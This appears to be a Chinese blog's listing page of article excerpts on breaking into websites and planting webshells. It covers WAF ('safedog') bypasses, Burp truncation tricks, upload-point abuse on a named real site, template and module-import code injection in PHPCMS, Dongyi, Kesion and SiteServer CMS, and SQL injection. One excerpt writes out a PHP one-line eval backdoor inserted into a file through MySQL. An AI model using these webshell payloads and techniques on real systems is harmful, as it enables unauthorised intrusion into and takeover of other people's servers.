摘要:
一: 无聊随便找了一个站,拿shell华众的主机,只是服务端的服务器,只支持asp,无ws组件一阵乱翻后,发现有su,直接上个大马,默认密码没改,端口也是开启的,whoami下,是system权限以为可以拿下的时候,发现了狗,阻止我加用户,不过狗只是阻止了net而已,我们可以用无nei的api添加用 阅读全文
摘要:
方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');SELECT 阅读全文
摘要:
http://www.chediandian.com/Join 存在2处上传点 测试后发现均存在同一问题,这里拿任意一处上传点举例 看一下源码: <object type="application/x-shockwave-flash" data="/Scripts/uploadify.swf" wi 阅读全文
摘要:
简要描述: 以前6.5的有人发的方法是,(进入后台 系统设置 管理数据表 管理系统模型 导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTd 阅读全文
摘要:
1.确定安全狗版本以及上传拦截功能开启 2.使用Burp截获POST请求并修改请求包 3.修改上传文件的后缀,新加←,也就是输入法v1选择←。 4.提示上传成功。 5.访问上传文件检查是否上传成功。 阅读全文
摘要:
刚刚群里面 有人发来了一个 有狗的phpweb 这位兄弟发来的shell直接进入后台 万能密码 go burp抓包 进行截断 大家看清楚 框框里面的 这个是一个安全狗 waf (我们都知道 phpweb 根本是不能截断拿shell的 但是有安全狗的waf帮忙就不同了 ) 截断成功 shell已经躺在 阅读全文
摘要:
登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图: 然后点击 search 这个文件夹,如下图: 然后点击修改 index.html 文件 然后把以下代码复制上去提交。 <?php defined('IN_PHPCMS') or exit('No permission resourc 阅读全文
摘要:
动易CMS、我相信大家都不陌生吧?互联网很多企业站点都是用的动易CMS。 说到动易CMS漏洞你们比我懂、拿shell方法也是数不胜数、今天给我大家演示一种快捷方便的方法。 废话不多说、大牛飘过、技术含量不高基佬们勿喷、下面进入演示。 默认的后台地址: ,,/admin/admin_login.asp 阅读全文
摘要:
虽然是基于《科讯CMS V7.0》但是不能用科讯7.0的后台拿shell方法,管理帐号密码可以用科讯的方法来获取,蓝方互联精简后不能添加自定义页面等,但可以导出标签,并能自定义导出的名称,没有过滤后缀,亮点就是随便添加个标签,html代码里写入了一句话,导出tnt.asp ,抄菜刀,连接,搞定! 阅读全文
摘要:
SiteServer 3.4.4 某业务流程逻辑错误,导致SQL注入,从而得到后台管理权限,进而拿到webshell。也可直接利用sqlserver配置不当拿到webshell或服务器权限 Example:http://127.0.0.1/UserCenter/register.aspx用户名填入以 阅读全文